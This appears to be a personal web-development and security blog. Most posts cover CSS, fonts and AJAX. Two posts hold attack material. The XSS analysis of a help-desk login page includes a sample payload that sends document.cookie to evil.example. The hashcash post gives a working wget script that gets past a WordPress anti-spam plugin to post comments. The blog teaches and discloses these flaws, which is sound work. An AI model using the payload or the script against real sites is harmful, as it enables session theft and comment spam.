Seth Woolley's Blog

Occasional Musings

graphviz vml output plugin(0)



Internet Explorer doesn't support SVG, but every other browser does.

Graphviz has an SVG output driver, but nothing for IE.


Internet Explorer supports VML, but no other browser does.

Implement a VML output plugin for Graphviz.


Now we get antialiased lines in any browser with graphviz!

Seth Woolley's Blog webdevel



I'll add things I observe here:

Fixed bugs I've noticed

  • My manual page viewer supports the sliding menu now with only one small change as noted below.

  • I think the > selector is now actually working on IE7.

Bugs I've noticed

  • to get display: block/none css menu stuff to work in IE7, you need to place the CSS (all instances, including an xml preprocessor stylesheet) _after_ the doctype so that it renders in standards-compliant mode.

  • the IE DOM Viewer seems cool, but it won't send refreshed data to validation services.

Seth Woolley's Blog webdevel

pure css menu hacks(0)

pure css menus

I've been working on some code to get CSS menus working in both IE and Firefox.  I stole an implementation from GRC and hacked it down to its fundamentals.  They used list items which required three times the code.  This is much better, IMO.

the xhtml

<div class="menu">
  <div class="key">Key</div>
  <div class="value">Value</div>
</div>

the css

.menu {
  position: relative; /* this is needed to get children to be relative to it */
  display: block;     /* not needed if using divs instead of spans */
  height: 18px;       /* needed to have a reference for the top value below */
  width: 20em;        /* width of the menu */
  background: white;  /* not transparent! (could be same color as parents) */
}

.menu .value {
  position: absolute; /* this is needed to be placed relative to parent menu */
  display: none;      /* hide it by default first */
  top: 18px;          /* this is relative to the height of the menu container */
  left: 0px;          /* this is relative to the left of the menu container */
  width: 20em;        /* width of the drop down menu */
  background: white;  /* not transparent! (could be same color as parents) */
}

.menu:hover .value {
  display: block;     /* show it when we hover over the parent */
}

Seth Woolley's Blog webdevel

miniature font updated(0)


I updated my miniature fonts a while back but needed to republish them, so here they are.

Five new versions

original small lowercase version
taller lowercase for readability
a double-size of swoolley2
a double-size of swoolley5
A serif'd version of swoolley2


Install the pcf.gz files into /usr/X11R6/lib/X11/fonts/misc/, run mkfontdir in that directory, then restart X (or run xset fp rehash). For fontconfig (which these sets now support), I had to change them from ascii encoding to iso-8859-1.  Run fc-cache instead of mkfontdir for fontconfig, of course.  For Windows, copy the .fon files into c:\Windows\fonts (or WinNT, depending on platform).

About was used to convert to bdf format, which is now the native format I use.  The pcf.gz files were compiled with 'bdftopcf | gzip -c'.  The fon files were generated with bdf2fnt.exe -c swoolley.bdf swoolley.fon.

The image represents swoolley, swoolley2, and swoolley5, in order, printable characters 21-7E (hexadecimal) -- the printable ascii range, not the full iso-8859-1 range.

Seth Woolley's Blog webdevel

anatomy of a typical XSS problem with user logins and cookies(0)


Repeatedly, I see the same stupid login/authentication cross-site scripting mistake, so I thought I'd tell everybody about it to remind people what not to do.



Check out the pmos help desk, here:

Looks normal.  Only a couple fields to enter data into, right?  Not quite: there's a variable that we don't see right away.

Click on a link in the header that looks like it might require authentication, say, the "Browse" link, like this:

The php is so smart it knows you haven't logged in yet.  So what does it do?  It gets smart -- it says, hey, I need you to login.  So I'm going to send you to the login page.  BUT, as an added convenience, I'm going to tell the login page to send you back at the end like this:

Isn't that nifty.  Yes and no.  Yes, it's nifty in that it's a cool design improvement, but no it's not in that it's another form of input into the system, one that isn't so carefully guarded because it'll never hit the SQL system.

An unsanitary problem

Let's download their source code and take a look at how they implemented it.  I just went to: and clicked and opened up login.php.  (Ignore their statement, "Also, please read the GPL license thoroughly. By no means can you use this code (or any of it) in your own product and sell it as your own -- that is completely illegal and will be prosecuted."  -- This is false.  The GPL lets you charge whatever you want for a copy so long as you keep the copyright notices intact and pass the source along under the same license.)

<form action="<?php echo $HD_CURPAGE ?>" method="post">
  <input type="hidden" name="cmd" value="login" />
  <input type="hidden" name="redirect" value="<?php echo ($_GET[redirect] != "" ) ? $_GET[redirect] : $_POST[redirect]; ?>">
  <tr><td><label for="email">Email: </td><td><input type="text" name="email" size="30" value="<?= $_POST[email] ?>" /></label></td></tr>
 <tr><td><label for="password">Password: </td><td><input type="password" name="password" size="30" /></label></td></tr>
 <tr><td><br /><input type="submit" value="Login" /></td></tr>

Ouch!  No sanitation whatsoever.  They let you do pretty much whatever you want before you login (this is not so dangerous).  Let's note the first problem in this code:

(Note that the email input field is also XSSable, but via the POST method.)

It just puts that directly into the hidden field for the redirect, without sanitation -- classic XSS.  On its own that's not so big a deal: if you're on the login page, your cookies probably aren't there to steal yet, assuming well-implemented session-only cookies -- which they don't have (they let them live for a whole month):

setcookie( "iv_helpdesk_login", $_POST[email], time( ) + 2592000 );
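The fix is old news: escape anything you echo back into HTML (in their PHP, htmlspecialchars would do it).  Here's the equivalent logic sketched in Python, with a hypothetical payload of my own invention:

```python
import html

# Hypothetical attacker-supplied redirect value:
redirect = '"><script>document.location="http://evil.example/?c="+document.cookie</script>'

# Echoed raw, as login.php does, this breaks out of the value="..." attribute.
# Escaped first, it stays inert:
safe = html.escape(redirect, quote=True)
field = '<input type="hidden" name="redirect" value="%s">' % safe
```

The quotes and angle brackets become entities, so the browser treats the whole payload as attribute text rather than markup.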


Delivering the payload

If you need to inject code where quotes aren't allowed (magic quotes are enabled, for example!), you can, for example, use the document.referrer property and set up your own site to serve two different sets of data, one intended for the client and another for the server, so the client gets the needed payload while the server sees something harmless.

Here's a way that just decodes part of the url for the payload to avoid magic quotes altogether:
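The idea (a sketch, not the original link's payload): quotes travel URL-encoded as %27, so server-side magic quotes never sees a literal quote character, and a client-side decode restores them.

```python
from urllib.parse import unquote

encoded = "alert(%27hi%27)"   # what the server (and magic quotes) sees: no quote characters
decoded = unquote(encoded)    # what a client-side decode hands to the interpreter
# decoded == "alert('hi')"
```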

(Tricks like this are why javascript should die.)

It gets worse from here

if( trim( $_POST[redirect] ) != "" )
  $redirect = $_POST[redirect];
else
  $redirect = $HD_URL_BROWSE;

$EXTRA_HEADER = "<meta http-equiv=\"refresh\" content=\"1; URL={$redirect}\" />";
$msg = "<div class=\"successbox\">Login successful.  Redirecting you now.  Click <a href=\"{$redirect}\">here</a> if you aren't automatically forwarded...</div>";

$do_redirect = 1;

Yep, they let you inject code _after_ login has succeeded, so if you want to make sure you get their auth data, just... let them log in first before activating your payload (which you could carry over via document.referrer instead of document.location if it's not an encrypted link)!

Note that magic quotes _must_ be enabled for pmos to work.

Magic quotes and SQL

Furthermore, it's littered with magic-quotes-expecting SQL commands like:

$res = mysql_query( "SELECT * FROM {$pre}user WHERE ( email = '$_POST[email]' && password = '$_POST[password]' )" );
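The cure, then as now, is parameterized queries rather than string interpolation.  A sketch of the difference using Python's sqlite3 in place of their MySQL calls (table and values are made up):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE user (email TEXT, password TEXT)")
con.execute("INSERT INTO user VALUES ('a@b.c', 'secret')")

email = "a@b.c"
password = "' OR '1'='1"  # classic injection attempt

# Interpolated directly, as above, the attempt succeeds: the OR clause
# matches the row despite the wrong password.
unsafe = ("SELECT * FROM user WHERE email = '%s' AND password = '%s'"
          % (email, password))
leaked = con.execute(unsafe).fetchall()

# With placeholders the input stays data, and the login fails as it should:
rows = con.execute(
    "SELECT * FROM user WHERE email = ? AND password = ?",
    (email, password)).fetchall()
```

With placeholders, magic quotes becomes irrelevant: the driver never splices the input into SQL text at all.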



Yeah, stay away from the h2desk pmos code (no idea about their commercial offering though), as it's not a good example of quality, secure code.

Seth Woolley's Blog webdevel security



A couple of weeks ago I received an email from the recruiter who saw my resume and invited me to interview at ScanAlert.  I emailed back and called the recruiter the next day to see what the position entailed.  It was for their "ethical hacker / penetration tester" position, which is still posted on their website.  I was curious so I thought I'd see what it's like there, having never worked in a "corporate" security environment, but instead for smaller businesses.  I talked to the Vice President of Engineering, Ben Tyler, and he offered a challenge on a fake website:

In our fictitious web site, one or more of the following
vulnerabilities may exist:

Cross Site Scripting
SQL Injection
Directory Listing
Path Disclosure

They wanted me to send an IP back to open up the url to me for 24 hours, but before I did that I was bothered by their apparent "find all the vulnerabilities and slap a sticker declaring it safe" mentality, so I took a look at their own website and in a few minutes happened upon an interesting XSS vulnerability that let me inject html attributes into a link.


I replied back with the following:

Hi Ben,

In reaction to your challenge to break into a fictitious website, I
must challenge you to secure your own website:

<XSS exploit url here>

When your recruiter contacted me for a position as a Professional /
Ethical Hacker / Penetration Tester, I was curious about the idea of
being employed by scanalert, however, I have had some doubts when you
said "find the vulnerabilities".  The use of a definite article led me
to believe that there might be a culture of "finding all the
vulnerabilities" in websites, declaring them secure, and then slapping
stickers on them.  There is no question as to the value of security
auditing, but it is just that, an audit, not a guarantee.  Questioning
the efficacy of such a culture, I decided to test its value by checking
your website for basic vulnerabilities.  In a matter of minutes I
discovered the above vulnerability.  The "Hacker Safe" concept should be
thought of as "Hacker Safer".

Now, I do acknowledge that perhaps I read too much into your wording
and that indeed, a culture of progressive security may yet exist at
scanalert, so I'm still interested in pursuing this position, but I need
some reassurance that a culture of asymptotic security thrives at
scanalert, that the Hacker Safe logo really means, internally,
Hacker Safer, and that I too will be able to gain progressive experience
in novel and interesting security techniques while employed at



No reply came back, but five days later I noticed they had fixed it, but poorly.  The following link still worked:

For a security website, I was disappointed that they couldn't fix the entire vulnerability, so I looked around for a few more vulns and sent them a more detailed report listing more things they probably wouldn't want their code to be doing, including an information leakage vulnerability and how their login form works well with XSS vulns to escalate privileges automatically.

They still haven't completely fixed the vulnerability, another five days later, so I'm publishing this blog entry to expose their inability to manage their own security.

Seth Woolley's Blog webdevel reallife security

exploitable too(0)


When will they ever learn?


As always: if only they read their own manual page...

Update: I looked again into this site to try to craft a vulnerability report:


And their copy of the questionable string is not the same as the one included on the CPAN website, yet the modified date is back in '97.  They are using the latest version of man2html though, 3.0.1.

Perhaps man.cgi has been updated and many bad man.cgi copies are still floating around, or the source code was fixed without changing the modified date in the tarball.

This is an odd development.  It seems every site I run into running this code is flawed -- why would there be so many flawed sites created after the last modified date?

Seth Woolley's Blog webdevel security

miniature font(0)


This font I made is demonstrated:


I drew it with: to convert to bdf format from the image I created.


compiled (with bdftopcf | gzip -c):


Install into /usr/X11R6/lib/X11/fonts/misc/, run mkfontdir in that directory, then restart X.

Seth Woolley's Blog webdevel

XSS not a security problem?(0)


Slashdot carried a link to an armchair security "institution" (Why make up a corny name for yourself, call it your company blog and expect kudos? Just blog under your own name!) that makes this claim:

"It is *of the utmost importance* to note that a page that has an XSS vulnerablity is no /more dangerous/ than visiting a random result generated by a Google search - something that users do all the time."

This is quite false.  He correctly identifies the first problem, the social engineering an XSS url may enable (although why he doesn't consider this "more dangerous" is beyond me).  However, he misses the second problem: since the XSS runs on the actual host, the javascript runs with that site's privileges for cookie access.  This lets you simply steal any of the site's cookies.

His article is thus flagrantly ignorant, and it should simply be ignored.  Everybody in the know already agrees that JavaScript is a gaping security hole and people shouldn't be running with it all the time.  While he gives credit to those trying to get JavaScript eliminated from the web, he discredits them by misrepresenting XSS's risk as a twisted argument to elevate the problems with JavaScript.

One might argue that it only strengthens his point that JavaScript sucks because it is the very thing that enables the problem with cookies and XSS.  However, he should have simply argued _that_ and improved his case.  Now his title is simply too false to have a lasting impact, despite the good merits of his goal.

Seth Woolley's Blog webdevel security

mozilla finally fixes security issue(0)


I reported this security issue three years ago:


Looks like they decided it was time to fix it after getting a duplicate report from somebody at Stanford.

Thanks Mozilla!

Seth Woolley's Blog webdevel security

another man viewer dumb(0)


Read the paragraph that reads:

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.


Looks like there was an attempt to sanitize cgi_section but not cgi_command -- it also looks like the code was hacked a bit, and the sanitation may have been there but was removed later.

Seth Woolley's Blog webdevel security

AJAX to Balkanize the web(0)


I've written on AJAX previously, so you are aware of my stance on AJAX, but my fears of balkanization are coming to fruition.

Take for example, Gates' recent memos on Web 2.0.  Microsoft is finally deciding that they can not only leverage their use of a web browser throughout their own products on a client workstation install, but they can turn Microsoft Office into a web service.

Why is this significant?  Because before AJAX, there was literally no reason to enable javascript in a browser.  Now software providers are finding more and more ways to make it a requirement.  Instead of thin services relying upon the basic CGI process, we'll have thick (in terms of bandwidth) services that will be ever so uselessly interactive.  Bandwidth requirements go up, computing power needs on the client go up, more Intel Processors ship, the ISPs justify running more and more bandwidth to homes, thick xml-based protocols promulgate, and all the corporations are happy.

Why is this bad for us?

First, it's bad because the developing world is not going to catch up to the system requirements any time soon; it cannot afford the thick clients and pipes needed for an AJAX-based Web 2.0.

Second, as more and more services are required to be download-based, asymmetry continues to develop in the ISPs' motivation to deliver bandwidth to end users.  Upload prices will remain high as ISPs reap large rewards from corporations that want in on the Web 2.0 world they develop.  Download bandwidth prices drop, but the only parties able to deliver the content will be corporations.

Thus the Web 2.0, far from being the democratic medium it was supposed to be, becomes fractured by ever-growing bandwidth and clock cycle differentiation.  Peer-to-peer systems and other democratic forms of communication become more and more infeasible as the asymmetry between download and upload speed continues to grow.  Web 2.0 becomes more broadcast-based and less peer-to-peer.  Democracy flounders.

So, how do we combat this?  Well, I have a few ideas.  Content providers who care can pursue the following policies:

First, they should continue to provide standards-compliant and accessibility-driven websites that follow core protocols and avoid implementing core utility features in javascript.  The semantic web is not a javascript world.  Neither the W3C, the IETF, nor any working group of the Internet Society standardized ECMAscript/javascript.  ECMA did.  ECMA is essentially clueless on policy decisions.

Second, instead of making crazy, proprietary thick-clients that only use part of the standards stack, we should continue to stick to W3C-based protocols such as XHTML, CSS, and XSLT.  I believe the free software community has done a pretty good job with this, especially in regard to open documentation and document formats.

Third, instead of promulgating arbitrary XML schemas, we need to ensure that XML schemas are well-documented.  Microsoft, for example, releases completely undocumented XML schemas.  Some free software projects have the same problem: the schema is documented only by its implementation, with no formal documentation that third-party developers can build against while expecting stability.

Fourth, if you have to use AJAX, make sure that it's got a very good reason, that it is accessibility-friendly, and that it's well-documented such that people can easily write accessible interfaces to the XML to present it using ones own scripts.

By following some simple guidelines (more are welcome), we can make sure Web 2.0 doesn't Balkanize the Internet, undemocratically, into content-providers and content-consumers.  Why will we prevail?  Because the very existence of these alternatives allows the continued interconnectedness of under-interconnected populaces.  With an alternative system provided, people will be free to participate in either system, and once the infrastructure is in place -- created by free software and the cooperation of developing countries' governments funding cheap, mass hardware deployments (hopefully enabled by the rejection of foreign patents) -- the content classes can create their private networks without risking the destruction of the public commons already created.

That still leaves only one major trick we have to perform: the democratization of ideas through the rejection of software and trivial hardware patents.  Software patents and absurd hardware patent enforcement will eliminate all the rosiness of my outlook and allow the content producers to monopolize, through a government-enforced monopoly, all the technologies that would have allowed the democracy of ideas to flourish.

Seth Woolley's Blog politics webdevel

wordpress hashcash broken(0)


As a proof of concept, I wrote a shell script to break hashcash.  It works on the author's own blog:

# SITE, POST, AUTHOR, EMAIL, URL, and COMMENT must be set first.
CPID="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep 'comment_post_ID' | cut -d'"' -f 14)"
MD5="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep '<form onsubmit' | cut -d"'" -f2 |
          tr -d '\n' | md5sum | cut -d' ' -f1)"
for i in 34; do  # here just change 34 to a list of guesses of what
                 # the length of ABSPATH is, 34 in this example
  wget --post-data="author=$AUTHOR&email=$EMAIL&url=$URL&comment=$COMMENT&submit=Submit+Comment&comment_post_ID=$CPID&$MD5=$(($CPID * $i))" $SITE/wp-comments-post.php
done
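If I'm reading the scheme right, the "proof of work" the plugin checks is just the post ID multiplied by the length of WordPress's ABSPATH string, so brute-forcing it is a handful of multiplications.  A sketch (the function name is mine):

```python
def hashcash_guesses(comment_post_id, min_len=1, max_len=100):
    """Candidate field values for every plausible ABSPATH length."""
    return [comment_post_id * n for n in range(min_len, max_len + 1)]

# With post ID 7 and the example ABSPATH length of 34,
# the accepted value would be 7 * 34.
```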

He uses javascript "obfuscation" to make it hard for people to find his installs.  Just look for this string, which isn't obfuscated on any install:

(str){var bin=Array();var mask=(1<<8)-1;for(var i=0;i<str.length*8;i+=8)bin[i>>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}

or just do this: ;)

Elliot Back thinks people can't code around his obfuscation.  It's rather trivial to defeat -- with an addition or two, this script can spam his site post after post.  Determining the length of ABSPATH for a single site doesn't take long either, and once you have it, it's the same for all posts.  He appears to do some fancy "per-user" stuff, too, but a spammer isn't going to be "a user" or bother to become one.

Of course, you can just "interpret" his javascript, too, as some spammers already do, but that can be more effort than it's worth.

Seth Woolley's Blog webdevel security

AJAX utility and Ruby On Rails(0)


I've been reading a bit about Ruby On Rails, and the hype surrounding it -- and I think for a minimalist such as myself it is intriguing.  First, I've always abhorred Javascript because it's like letting an untrusted user run almost arbitrary code in your machine's security context.  Of course sandboxes are an attempt to mitigate that, but the risk of simulating the presentation too well is always at hand.  So while Ruby On Rails seems interesting, I'm not sure how much I'd like it.

Yes, Ruby appears to be a language that's taken a lot of input from the Python and Perl (and LISP and PHP, et cetera) communities and done the Right Thing most steps of the way, and it's the next language I want to spend a lot of time with, but this integrated JavaScript thing -- I'm just left with mixed feelings.  Perhaps if it were done in Python I could keep myself untainted by both ugly concepts, but this is Ruby, and I have to consider it.

That said, I've considered it, and I can see a place for AJAX given such nice apps as, but when I have a text browser up, I really just need to get work done, and the more AJAX, the more I fear the web will Balkanize into AJAX-graphical-manipulation worlds and the rest of the world, where text browsers are useful.  My philosophy thus, as it always has been, is to keep JavaScript out of the required interface elements and confine it to an optional, added-later interface for those who don't grok text-based interfaces so well.  I find, instead, that text-based interfaces are simply faster than graphical interfaces in most cases.  True, I won't part with my mouse just yet, and it has its place, but I think 99% of the time, I really just want to use my Vulcan Mind Meld into my keyboard for interfacing into my computer.

Seth Woolley's Blog webdevel

TrackBack and PingBack revisited(0)


A short while after TrackBack and PingBack were introduced, I wrote a blog entitled "The Problems with TrackBack and PingBack" where I laid out that both were a completely useless addition to the web and only worked to increase security risks by adding a plethora of complex code additions.

It turns out that I was correct.

Rather than repeating what I wrote, which has since been lost to a hard drive crash, I found a good summary of what to do instead here:

I wish I had a copy of what I wrote, as it predates that entry by six months, but that will have to suffice.

So in summary, please, disable trackback and pingback and use the existing methods we already have.

For clarification, the existing methods are:

  • for comment-aggregation, use a blog that allows comments to be edited by the user.  A "feature" of trackback is the "remote comment".  Instead, post a link to the comment in your blog, or post a comment on the remote blog that links back to yours.  This prevents unneeded duplication as well.
  • for link-aggregation, use a referrer analyzer that validates the legitimacy of referrers.
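As a sketch of what validating a referrer's legitimacy might mean (hypothetical function of mine, not any particular analyzer's API): fetch the page named in the Referer header and confirm it actually links to you -- spammed headers usually name pages with no such link.

```python
def referrer_links_back(referrer_html, my_url):
    """Given the fetched HTML of the referring page, check it really links here."""
    return ('href="%s"' % my_url) in referrer_html
```

A real analyzer would do the fetching itself, cache results, and rate-limit the checks so the validation can't be used to make your server hammer third-party sites.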

Seth Woolley's Blog webdevel security